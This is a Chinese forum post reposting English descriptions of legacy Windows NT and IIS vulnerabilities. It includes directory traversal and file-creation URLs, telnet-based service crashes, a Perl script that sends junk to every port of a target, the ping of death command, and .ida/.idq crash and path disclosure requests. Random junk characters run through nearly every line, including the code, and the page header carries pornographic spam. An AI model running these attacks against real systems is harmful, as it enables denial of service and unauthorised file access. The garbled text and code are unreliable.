国产十八禁AV网站,欧美日韩亚洲国产综合乱,亚洲国产aⅴ成人精品无吗,秋霞午夜福利影院合集


       找回密碼
       注冊

      QQ登錄

      只需一步,快速開始

      NT的漏洞及描述(英文)

      [復制鏈接]
      1#
      發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序瀏覽 |閱讀模式
      受影響系統(tǒng):4.0,iis 1.0
      6 f# k# {4 ]8 [+ iA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
      " `9 Q" i9 J; k+ T! R* a" f# F" e9 v7 s% o
      A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
      4 M; o0 ]7 z8 p  h* V
      : F- D& }& Q# r9 C: }By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
      % t8 n6 A. u, y$ ^% c) I3 F% m- B5 F% e) q
      --------------------------------------------------------------------% ~& I; L: T% y+ x5 M
      ! ^- ?& p+ I/ v. ]" [7 d% E8 H3 U- w8 |( Y
      受影響系統(tǒng):4.0- V( R* O% P: T( V
      A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
      6 M* z* Z: ]* ?0 l- R
      9 r! A* x, [1 U/ F6 @- h7 {If the file 'target.bat' exists, the file will be truncated.& M7 b2 D2 |6 W# Q1 s. k3 U- s, m
      ( h" P6 u8 ^: P
      . z/ _" v- l# l" C* g2 f8 O* B
      A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.6 W1 P7 E; Q+ v- R! ?
      : J, v5 k8 R! x% r$ P2 D* z; B
      ----------------------------------------------------------------------
      8 K; ^7 x7 D" s6 d2 M
      ( z; h! J9 o# F& X受影響系統(tǒng):3.51,4.08 f. x* t% p0 Q0 g, q3 A; f
      Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
      0 F+ W  r+ {5 I' A0 x4 J
      ' {2 V& v6 H( lThe following steps;
      5 h- K( U! W0 t; f9 `: Y: j8 w
      7 h/ s, G9 T& ~Telnet to an NT 4.0 system on port 135
      ) W5 \# z- D) @9 V. NType about 10 characters followed by a <CR> / a& O: i4 |- Z- s
      Exit Telnet % _4 s1 j' K  j" q! P/ d
      results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
      $ O0 W  K; c# a# S! I+ r* z6 W1 m- X
      When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.0 H6 b/ x0 q: \/ G. M* n0 z
      ' F: c" _2 r$ R/ c# f& \
      The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.; w6 e. |# x/ [! ], s* |0 x

      & ^& u9 A/ m4 t; oIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.4 I$ p/ E' X+ o! B& |* t
      0 `+ H, u# x4 n, }! S/ R( i# X0 o# U4 L
      The following is modified perl script gleaned from postings in the [email protected] list to test ports on your system (Perl is available from the NT resource kit):8 W0 a+ F6 k" E3 P  A4 g3 M! k
      - w4 w1 I' v3 a1 z3 v8 c7 t) M
      /*begin poke code*/) v9 E: h* i: D, D0 X4 ^, G6 Q
      0 G1 P* ~3 Q* \+ @! ?7 W
      use Socket;7 W: M8 R1 H+ x+ `# S( Z) q0 E
      use FileHandle;
      8 j; K2 ~7 }+ `2 O1 J; Srequire "chat2.pl";
      3 i6 F2 m9 A/ b& p+ V1 ]/ }/ d) Y* ?! {$ {" n
      $systemname = $ARGV[0] && shift;
      ' g; h7 \1 j: N- H: B5 J9 [# A! p" Z8 Z. {+ p4 Y, \
      $verbose = 1; # tell me what you're hitting, Q% ~4 d$ ~/ c0 \4 u
      $knownports = 1; # don't hit known problem ports
        }2 W% }: G9 U% H! Y( U/ gfor ($port = $0; $port<65535; $port++) - ]  L$ n1 b* [/ _$ X: k) I
      {/ U: m: F/ C' y& k5 J( K1 q. N
      % c4 S% D; R! W% r" Q9 Z
      1 y  d, E8 A# X7 I
      if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {. Q3 Q- N- m+ F' ]7 p5 u, G! ?
      next;
      $ p, ]! V5 L2 K* O0 J}# f0 d& _0 V0 x+ ^
      $fh = chat::open_port($systemname, $port);, Z$ E) [1 n& a7 z* F
      chat::print ($fh,"This is about ten characters or more");
      $ V1 D  W/ ^8 s- ~7 x  i4 @if ($verbose) {
      # e+ P% l" \. l2 I& T, bprint "Trying port: $port\n";* t% x, u$ P% L, |
      }
      / C3 _/ c% B; A1 Y+ n9 p: Ichat::close($fh);
      9 N/ x2 ?' V8 j4 ~! Z. M, I# [* I1 d& W% @
      }/ P2 L9 k8 @0 B; D+ p

      " K. g! m$ `& W; e! t- H7 A+ }' X+ _  g, M" z, B2 h3 z
      /*end poke code*/% r2 }9 ^8 P5 P1 f; l  L; T
      ) P5 T3 O: W3 C$ e$ J
      Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername- S9 j4 I/ u5 c# B. y& I7 `# l4 v
      ! F3 o6 H. }( B% u' \1 }
      --------------------------------------------------------------------------------! e( S$ Q8 v5 R1 F8 p

      # Y) C8 ?& R- u, I: P受影響系統(tǒng):4.07 t0 _1 |( l* B
      Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
      8 f0 e9 ^* A* ]& V/ C$ q$ ^( ]0 i5 P6 ~0 g; J7 o5 N
      This attack causes Dr. Watson to display an alert window and to log an error:
      0 F3 c% @9 h3 I0 }* j6 x  n6 p  v
      "The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
      ( T" |, R3 x2 a; S
      6 `/ e5 \! @4 v( q5 X8 f, I--------------------------------------------------------------------------------! j+ N7 C5 k3 |$ d
      ) i+ k6 i! y. j' Z! y7 X( J* b' J* q
      受影響系統(tǒng):3.51,4.0. L' C  j/ v8 @
      Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:/ w) n7 l, j: _# k$ L! [
      5 m. H  l+ K% y/ e" [$ ^- t
      STOP: 0X0000001E; p: L$ d( `6 ]' r! b8 M
      KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS! _1 l: c1 F9 i
      0 B# P7 _/ l1 x# T  t+ h
      -OR-, V. S& F- ?  {9 k

      & ]* m: G$ m, F3 aSTOP: 0x0000000A
      # `) n  C# w- N( aIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
      ! H! E# J% ]: p/ m) S" Z$ G9 S+ c0 D- W; o/ G3 M0 c
      NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.+ o0 B: H# v# Y& h( ?; S

      . K+ z' j( ?5 |4 H--------------------------------------------------------------------------------6 `! s9 ?/ w5 y8 O5 {

      , f* l$ E7 |5 |! SMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). " e4 F  n. r) }

      ) g* z) {) f; B; o% ?2 u--------------------------------------------------------
      : Z3 X7 R( h' |5 y
      / P. h  x& g- J, H6 M7 I+ |IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
      您需要登錄后才可以回帖 登錄 | 注冊

      本版積分規(guī)則

      QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機版|小黑屋|汶上信息港 ( 魯ICP備19052200號-1 )

      GMT+8, 2025-4-20 11:25

      Powered by Discuz! X3.5

      © 2001-2025 Discuz! Team.

      快速回復 返回頂部 返回列表